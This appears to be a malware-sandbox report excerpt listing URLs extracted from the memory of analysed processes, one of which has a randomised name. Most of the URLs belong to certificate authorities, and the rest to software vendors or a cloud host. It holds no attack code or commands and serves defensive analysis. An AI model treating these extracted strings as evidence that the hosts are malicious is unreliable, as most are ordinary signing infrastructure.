Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3032814487.0000020EEB850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3045117994.0000020EEC0C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024035894.0000020EEB370000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E9007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3032814487.0000020EEB850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3045117994.0000020EEC0C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024035894.0000020EEB370000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E9007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: http://compositewpf.codeplex.com/
Source: VucRf0jboS.exe, 00000000.00000003.2187851077.00000000075EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3032814487.0000020EEB850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3045117994.0000020EEC0C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024035894.0000020EEB370000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E9007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
Source: VucRf0jboS.exe, 00000000.00000003.2187851077.00000000075EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3032814487.0000020EEB850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3045117994.0000020EEC0C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024035894.0000020EEB370000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E9007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3032814487.0000020EEB850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3045117994.0000020EEC0C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024035894.0000020EEB370000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E9007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: VucRf0jboS.exe, 00000000.00000003.2187851077.00000000075EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: VucRf0jboS.exe, 00000000.00000003.2187851077.00000000075EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3032814487.0000020EEB850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3045117994.0000020EEC0C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024035894.0000020EEB370000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E9007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: VucRf0jboS.exe, 00000000.00000003.2187851077.00000000075EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: VucRf0jboS.exe, 00000000.00000003.2187851077.00000000075EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dejavu.sourceforge.net
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/License
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/Lic
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts
Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://download.iolo.net
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense
Source: run.exe, run.exe, 00000003.00000002.1992656537.0000000000D3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000003.00000000.1907137804.0000000000D3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000E.00000002.2294114402.0000000000D3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000E.00000000.2231681830.0000000000D3C000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnection
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E803E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://gig-ai-prod-wus2-02-app-v4-tag.westus2.cloudapp.azure.com
Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://google.com
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3032814487.0000020EEB850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3045117994.0000020EEC0C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024035894.0000020EEB370000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E9007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3032814487.0000020EEB850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3045117994.0000020EEC0C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024035894.0000020EEB370000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E9007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3032814487.0000020EEB850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3045117994.0000020EEC0C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024035894.0000020EEB370000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E9007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: VucRf0jboS.exe, 00000000.00000003.2187851077.00000000075EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0H
Source: VucRf0jboS.exe, 00000000.00000003.2187851077.00000000075EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0L
Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3032814487.0000020EEB850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3045117994.0000020EEC0C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024035894.0000020EEB370000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E9007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: VucRf0jboS.exe, 00000000.00000003.2187851077.00000000075EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s2.symcb.com0
